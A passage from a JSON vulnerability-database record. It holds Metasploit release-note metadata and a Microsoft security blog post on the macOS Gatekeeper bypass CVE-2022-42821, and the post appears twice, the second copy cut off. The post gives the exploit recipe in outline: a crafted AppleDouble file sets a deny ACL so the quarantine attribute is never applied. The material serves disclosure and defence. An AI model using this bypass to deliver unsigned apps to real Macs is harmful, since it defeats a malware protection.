6.1.36...6.1.37](<https://github.com/rapid7/metasploit-framework/compare/6.1.36...6.1.37>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T17:50:10", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22616", "CVE-2022-26904", "CVE-2022-28381"], "modified": "2022-04-08T17:50:10", "id": "RAPID7BLOG:FF690F32AA83905D50C2FF923E9DD339", "href": "https://blog.rapid7.com/2022/04/08/metasploit-wrap-up-151/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-12-20T03:05:16", "description": "On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple\u2019s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call \u201cAchilles\u201d. Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.\n\nAfter carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/msrc/msvr>) (MSVR). Fixes for the vulnerability, now identified as [CVE-2022-42821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42821>), were quickly released by Apple to all their OS versions. We note that Apple's [Lockdown Mode](<https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/>), introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles. End-users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.\n\nIn this blog post, we share information about [Gatekeeper](<https://support.apple.com/en-us/HT202491>) and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.\n\n## Unlocking the Gatekeeper security mechanism\n\nMany macOS infections are the result of users running malware, oftentimes inadvertently. Fake app bundles might masquerade themselves as different apps, like Flash Player, or as a legitimate file, such as using a PDF icon and using the app name \u201cResume\u201d. To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named _com.apple.quarantine_ and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent [sandbox escapes](<https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/>). In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:\n\n 1. If the app is validly signed and notarized, meaning approved by Apple, then a prompt requires the user\u2019s consent before its launched.\n 2. Otherwise, the user is informed that the app cannot be run as it\u2019s untrusted.\n\nExtended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the _com.apple.quarantine_ attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:\n \n \n flag;date;agent_name;UUID\n\nExtended attributes can be viewed or modified with the [_xattr_](<https://ss64.com/osx/xattr.html>) command line utility.\n\nA flag value of \u201c0083\u201d enforces Gatekeeper restrictions on the file, as displayed below:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-1.-A-common-com.apple_.quarantine-extended-attribute-value.png)Figure 1. A common _com.apple.quarantine_ extended attribute value ![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-2.-Gatekeeper-blocking-an-untrusted-downloaded-file.png)Figure 2. Gatekeeper blocking an untrusted downloaded file\n\nDue to its essential role in stopping malware on macOS, Gatekeeper is a helpful and effective security feature. However, considering there have been numerous bypass techniques targeting the security feature in the past, Gatekeeper is not bulletproof. Gaining the ability to bypass Gatekeeper has dire implications as sometimes malware authors leverage those techniques for initial access.\n\n## Historical overview of Gatekeeper bypasses\n\nNumerous Gatekeeper bypasses have been identified in the past years, some even [abused by malware families](<https://www.bleepingcomputer.com/news/security/apple-fixes-macos-zero-day-bug-exploited-by-shlayer-malware/>) such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:\n\n 1. Misuse the _com.apple.quarantine_ extended attribute assignment.\n 2. Find a vulnerability in the components that enforce policy checks on quarantined files.\n\nTwo cases that we don\u2019t consider to constitute a \u201ctrue\u201d Gatekeeper bypass are:\n\n 1. Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.\n 2. MITRE\u2019s definition of \u201cGatekeeper Bypass\u201d ([T1553.001](<https://attack.mitre.org/techniques/T1553/001/>)), which requires code execution to forcefully modify or remove the _com.apple.quarantine_ extended attribute.\n\nHere are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:\n\n**Vulnerability**| **Exploits**| **Description** \n---|---|--- \n**[CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)**| Assignment of the quarantine attribute.| Gzip files archived in BOM archives are not assigned with the quarantine extended attribute, further detailed [here](<https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/>). \n**[CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>)**| Assignment of the quarantine attribute.| Paths longer than 886 characters were not assigned with extended attributes. Therefore, creating a symbolic link that points to an app that resides in a long path results in a Gatekeeper bypass. Since symbolic links are not assigned with the quarantine attribute, it was possible to completely bypass Gatekeeper, as outlined [here](<https://labs.withsecure.com/blog/the-discovery-of-cve-2021-1810/>). \n**[CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)**| Component(s) that enforce policy checks.| App bundles with a missing _Info.plist_ and a shell script main executable component are treated incorrectly by _syspolicyd_, a component that enforces policy restrictions on apps. Writeups can be found [here](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) and [here](<https://objective-see.org/blog/blog_0x64.html>). \n**[CVE-2021-30853](<https://nvd.nist.gov/vuln/detail/CVE-2021-30853>)**| Component(s) that enforce policy checks.| A security bug in the way files with a \u201c_Shebang_\u201d (#!) header are interpreted by _syspolicyd_ cause it to consider the app bundle to be safe, as detailed [here](<https://objective-see.org/blog/blog_0x6A.html>). \n**[CVE-2019-8656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8656>)**| Assignment of the quarantine attribute.| Since symbolic links are not assigned with the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented [here](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>). \n**[CVE-2014-8826](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8826>)**| Component(s) that enforce policy checks.| Quarantine attributes are not checked for JAR files, which are run by Java, as summarized [here](<https://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html>). \n \n## Metadata persistence over AppleDouble\n\nIntrigued by [CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>), as listed in the above table, we wondered what mechanism could be leveraged in archives. Considering symbolic links are preserved in archives and aren\u2019t assigned with quarantine attributes\u2014we looked for a mechanism that could persist different kinds of metadata over archives.\n\nAfter some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.\n\nEven though extended attributes are common on different filesystems, they might be implemented differently or even not supported, so copying files with their metadata becomes a challenging task. To solve this problem, [back in 1994](<https://www.rfc-editor.org/rfc/rfc1740.txt>), Apple introduced the concept of AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there\u2019s only a \u201csingle\u201d file to process, whereas AppleDouble saves the metadata in a different file side-by-side next to the original file, with a \u201c._\u201d prefix.\n\nInterestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file with the appropriate metadata.\n\nThe AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository in [the file](<https://github.com/apple/darwin-xnu/blob/main/bsd/vfs/vfs_xattr.c>) that handles extended attributes, which also includes ASCII-art depiction of the format. To demonstrate the AppleDouble file information, we used the [_ditto_](<https://ss64.com/osx/ditto.html>) utility as such:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-3.-AppleDouble-file-created-as-._somefile.png)Figure 3. AppleDouble file created as \u201c._somefile\u201d\n\nWhen the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-4.-Using-AppleDouble-in-a-zip-file-to-preserve-extended-attributes.png)Figure 4. Using AppleDouble in a zip file to preserve extended attributes\n\nUsing this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.\n\nOur first approach was to generate many large extended attributes in the AppleDouble format such that there won\u2019t be enough space to assign the _com.apple.quarantine_ extended attribute. Interestingly, it doesn\u2019t work\u2014AppleDouble is ignored if the overall size is over 2 GB, and there is no limitation on the number of extended attributes a file could get (besides the size of the disk).\n\nResearching further, we decided to examine the [source code](<https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html>) of the unarchiving mechanism. Carefully studying the _copyfile_unpack_ implementation, we discovered an option for a special extended attribute named _com.apple.acl.text_ (saved in the _XATTR_SECURITY_NAME_ constant in the source code), which is used to set arbitrary Access Control Lists.\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-5.-The-code-that-allows-setting-arbitrary-Access-Control-Lists-1024x560.png)Figure 5. The code that allows setting arbitrary Access Control Lists\n\n## Using ACLs for exploitation\n\nAccess Control Lists (ACLs) are a mechanism in macOS that further extends the traditional permission model. The traditional permission model saves permission for each file in a file \u201cmode\u201d, which can be changed by using the [_chmod_](<https://ss64.com/osx/chmod.html>) utility. It enforces permissions on the owning user, owning group, and others in terms of reading (r), writing (w) and launching (x). A file\u2019s mode can be viewed by listing files with the \u201c_-l_\u201d (long) flag:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-6.-Viewing-the-hello.sh-file-mode-the-owner-can-do-anything-while-others-can-only-read-or-launch-it.png)Figure 6. Viewing the "hello.sh" file mode, the owner can do anything while others can only read or launch it\n\nUnlike the traditional permission mechanism, ACLs allow fine-grained permissions to files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules. Like the file mode, ACLs can be modified with the _chmod_ utility and viewed with the _ls_ utility. It\u2019s important to note that file access checks are dictated by both ACLs and the traditional permission model mechanisms, as demonstrated by the following example:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-7.-Denying-file-reads-from-everyone-makes-it-impossible-to-read-the-file-despite-its-mode.png)Figure 7. Denying file reads from everyone makes it impossible to read the file despite its mode\n\nThe set of authorizations supported by ACLs is well-documented by Apple in the _chmod_ manual, which contain more than the traditional reading, writing, or launching abilities, including:\n\n * _writeattr_: controls the ability to write attributes to the file\n * _writeextattr_: controls the ability to write extended attributes to the file\n * _writesecurity_: controls the ability to set ACLs to the file\n * _chown_: controls the ability to set the owner of the file\n * _delete:_ controls the ability to delete the file\n\nEquipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the _com.apple.quarantine_ attribute.\n\nTwo minor challenges that we had to overcome during the proof-of-concept (POC) development were:\n\n * The format of the ACL text as saved in the AppleDouble file isn\u2019t identical to the format of the _chmod_ command line. This can easily be overcome by invoking the macOS [_acl_to_text_](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/acl_to_text.3.html>) API and saving the ACL with the correct format.\n * When using the _ditto_ utility, the _com.apple.acl.text_ extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.\n\nTherefore, our POC is as follows:\n\n 1. Create a fake directory structure with an arbitrary icon and payload.\n 2. Create an AppleDouble file with the _com.apple.acl.text_ extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of \u201c_everyone deny write,writeattr,writeextattr,writesecurity,chown_\u201d). Perform the correct AppleDouble patching if using _ditto_ to generate the AppleDouble file.\n 3. Create an archive with the application alongside its AppleDouble file and host it on a web server.\n\nWe named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our POC recorded video can be viewed here:\n\nThe AppleDouble file we used for this Gatekeeper bypass can be generated, as displayed below:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-8.-Generic-AppleDouble-file-that-can-be-used-for-any-Gatekeeper-bypass.png)Figure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass\n\n## Improving security for all through research and threat intelligence sharing\n\nThe threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues\u2014regardless of the platform or device in use.\n\nAs environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved [Microsoft Defender\u2019s Vulnerability Management](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-capabilities?view=o365-worldwide>) capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on [macOS devices](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac?view=o365-worldwide>) by examining AppleDouble files misusing ACLs.\n\nThis case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.\n\n![Microsoft Defender for Endpoint detecting and preventing an AppleDouble file](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-9.-Microsoft-Defender-for-Endpoint-preventing-the-vulnerability.png)Figure 9. Detection by Microsoft Defender for Endpoint\n\nOur Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users\u2019 computing experiences, be it a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.\n\n**Jonathan Bar Or**\n\nMicrosoft 365 Defender Research Team\n\nThe post [Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability](<https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-12-19T18:00:00", "type": "mmpc", "title": "Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8826", "CVE-2019-8656", "CVE-2021-1810", "CVE-2021-30657", "CVE-2021-30853", "CVE-2022-22616", "CVE-2022-26706", "CVE-2022-42821"], "modified": "2022-12-19T18:00:00", "id": "MMPC:447DB6FB8D54C72486ECF54472FDAD42", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "mssecure": [{"lastseen": "2022-12-20T03:05:39", "description": "On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple\u2019s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call \u201cAchilles\u201d. Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.\n\nAfter carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/msrc/msvr>) (MSVR). Fixes for the vulnerability, now identified as [CVE-2022-42821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42821>), were quickly released by Apple to all their OS versions. We note that Apple's [Lockdown Mode](<https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/>), introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles. End-users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.\n\nIn this blog post, we share information about [Gatekeeper](<https://support.apple.com/en-us/HT202491>) and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.\n\n## Unlocking the Gatekeeper security mechanism\n\nMany macOS infections are the result of users running malware, oftentimes inadvertently. Fake app bundles might masquerade themselves as different apps, like Flash Player, or as a legitimate file, such as using a PDF icon and using the app name \u201cResume\u201d. To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named _com.apple.quarantine_ and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent [sandbox escapes](<https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/>). In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:\n\n 1. If the app is validly signed and notarized, meaning approved by Apple, then a prompt requires the user\u2019s consent before its launched.\n 2. Otherwise, the user is informed that the app cannot be run as it\u2019s untrusted.\n\nExtended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the _com.apple.quarantine_ attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:\n \n \n flag;date;agent_name;UUID\n\nExtended attributes can be viewed or modified with the [_xattr_](<https://ss64.com/osx/xattr.html>) command line utility.\n\nA flag value of \u201c0083\u201d enforces Gatekeeper restrictions on the file, as displayed below:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-1.-A-common-com.apple_.quarantine-extended-attribute-value.png)Figure 1. A common _com.apple.quarantine_ extended attribute value ![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-2.-Gatekeeper-blocking-an-untrusted-downloaded-file.png)Figure 2. Gatekeeper blocking an untrusted downloaded file\n\nDue to its essential role in stopping malware on macOS, Gatekeeper is a helpful and effective security feature. However, considering there have been numerous bypass techniques targeting the security feature in the past, Gatekeeper is not bulletproof. Gaining the ability to bypass Gatekeeper has dire implications as sometimes malware authors leverage those techniques for initial access.\n\n## Historical overview of Gatekeeper bypasses\n\nNumerous Gatekeeper bypasses have been identified in the past years, some even [abused by malware families](<https://www.bleepingcomputer.com/news/security/apple-fixes-macos-zero-day-bug-exploited-by-shlayer-malware/>) such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:\n\n 1. Misuse the _com.apple.quarantine_ extended attribute assignment.\n 2. Find a vulnerability in the components that enforce policy checks on quarantined files.\n\nTwo cases that we don\u2019t consider to constitute a \u201ctrue\u201d Gatekeeper bypass are:\n\n 1. Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.\n 2. MITRE\u2019s definition of \u201cGatekeeper Bypass\u201d ([T1553.001](<https://attack.mitre.org/techniques/T1553/001/>)), which requires code execution to forcefully modify or remove the _com.apple.quarantine_ extended attribute.\n\nHere are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:\n\n**Vulnerability**| **Exploits**| **Description** \n---|---|--- \n**[CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)**| Assignment of the quarantine attribute.| Gzip files archived in BOM archives are not assigned with the quarantine extended attribute, further detailed [here](<https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/>). \n**[CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>)**| Assignment of the quarantine attribute.| Paths longer than 886 characters were not assigned with extended attributes. Therefore, creating a symbolic link that points to an app that resides in a long path results in a Gatekeeper bypass. Since symbolic links are not assigned with the quarantine attribute, it was possible to completely bypass Gatekeeper, as outlined [here](<https://labs.withsecure.com/blog/the-discovery-of-cve-2021-1810/>). \n**[CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)**| Component(s) that enforce policy checks.| App bundles with a missing _Info.plist_ and a shell script main executable component are treated incorrectly by _syspolicyd_, a component that enforces policy restrictions on apps. Writeups can be found [here](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) and [here](<https://objective-see.org/blog/blog_0x64.html>). \n**[CVE-2021-30853](<https://nvd.nist.gov/vuln/detail/CVE-2021-30853>)**| Component(s) that enforce policy checks.| A security bug in the way files with a \u201c_Shebang_\u201d (#!) header are interpreted by _syspolicyd_ cause it to consider the app bundle to be safe, as detailed [here](<https://objective-see.org/blog/blog_0x6A.html>). \n**[CVE-2019-8656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8656>)**| Assignment of the quarantine attribute.| Since symbolic links are not assigned with the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented [here](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>). \n**[CVE-2014-8826](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8826>)**| Component(s) that enforce policy checks.| Quarantine attributes are not checked for JAR files, which are run by Java, as summarized [here](<https://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html>). \n \n## Metadata persistence over AppleDouble\n\nIntrigued by [CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>), as listed in the above table, we wondered what mechanism could be leveraged in archives. Considering symbolic links are preserved in archives and aren\u2019t assigned with quarantine attributes\u2014we looked for a mechanism that could persist different kinds of metadata over archives.\n\nAfter some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.\n\nEven though extended attributes are common on different filesystems, they might be implemented differently or even not supported, so copying files with their metadata becomes a challenging task. To solve this problem, [back in 1994](<https://www.rfc-editor.org/rfc/rfc1740.txt>), Apple introduced the concept of AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there\u2019s only a \u201csingle\u201d file to process, whereas AppleDouble saves the metadata in a different file side-by-side next to the original file, with a \u201c._\u201d prefix.\n\nInterestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file with the appropriate metadata.\n\nThe AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository in [the file](<https://github.com/apple/darwin-xnu/blob/main/bsd/vfs/vfs_xattr.c>) that handles extended attributes, which also includes ASCII-art depiction of the format. To demonstrate the AppleDouble file information, we used the [_ditto_](<https://ss64.com/osx/ditto.html>) utility as such:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-3.-AppleDouble-file-created-as-._somefile.png)Figure 3. AppleDouble file created as \u201c._somefile\u201d\n\nWhen the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-4.-Using-AppleDouble-in-a-zip-file-to-preserve-extended-attributes.png)Figure 4. Using AppleDouble in a zip file to preserve extended attributes\n\nUsing this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.\n\nOur first approach was to generate many large extended attributes in the AppleDouble format such that there won\u2019t be enough space to assign the _com.apple.quarantine_ extended attribute. Interestingly, it doesn\u2019t work\u2014AppleDouble is ignored if the overall size is over 2 GB, and there is no limitation on the number of extended attributes a file could get (besides the size of the disk).\n\nResearching further, we decided to examine the [source code](<https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html>) of the unarchiving mechanism. Carefully studying the _copyfile_unpack_ implementation, we discovered an option for a special extended attribute named _com.apple.acl.text_ (saved in the _XATTR_SECURITY_NAME_ constant in the source code), which is used to set arbitrary Access Control Lists.\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-5.-The-code-that-allows-setting-arbitrary-Access-Control-Lists-1024x560.png)Figure 5. The code that allows setting arbitrary Access Control Lists\n\n## Using ACLs for exploitation\n\nAccess Control Lists (ACLs) are a mechanism in macOS that further extends the traditional permission model. The traditional permission model saves permission for each file in a file \u201cmode\u201d, which can be changed by using the [_chmod_](<https://ss64.com/osx/chmod.html>) utility. It enforces permissions on the owning user, owning group, and others in terms of reading (r), writing (w) and launching (x). A file\u2019s mode can be viewed by listing files with the \u201c_-l_\u201d (long) flag:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-6.-Viewing-the-hello.sh-file-mode-the-owner-can-do-anything-while-others-can-only-read-or-launch-it.png)Figure 6. Viewing the "hello.sh" file mode, the owner can do anything while others can only read or launch it\n\nUnlike the traditional permission mechanism, ACLs allow fine-grained permissions to files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules. Like the file mode, ACLs can be modified with the _chmod_ utility and viewed with the _ls_ utility. It\u2019s important to note that file access checks are dictated by both ACLs and the traditional permission model mechanisms, as demonstrated by the following example:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-7.-Denying-file-reads-from-everyone-makes-it-impossible-to-read-the-file-despite-its-mode.png)Figure 7. Denying file reads from everyone makes it impossible to read the file despite its mode\n\nThe set of authorizations supported by ACLs is well-documented by Apple in the _chmod_ manual, which contain more than the traditional reading, writing, or launching abilities, including:\n\n * _writeattr_: controls the ability to write attributes to the file\n * _writeextattr_: controls the ability to write extended attributes to the file\n * _writesecurity_: controls the ability to set ACLs to the file\n * _chown_: controls the ability to set the owner of the file\n * _delete:_ controls the ability to delete the file\n\nEquipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the _com.apple.quarantine_ attribute.\n\nTwo minor challenges that we had to overcome during the proof-of-concept (POC) development were:\n\n * The format of the ACL text as saved in the AppleDouble file isn\u2019t identical to the format of the _chmod_ command line. This can easily be overcome by invoking the macOS 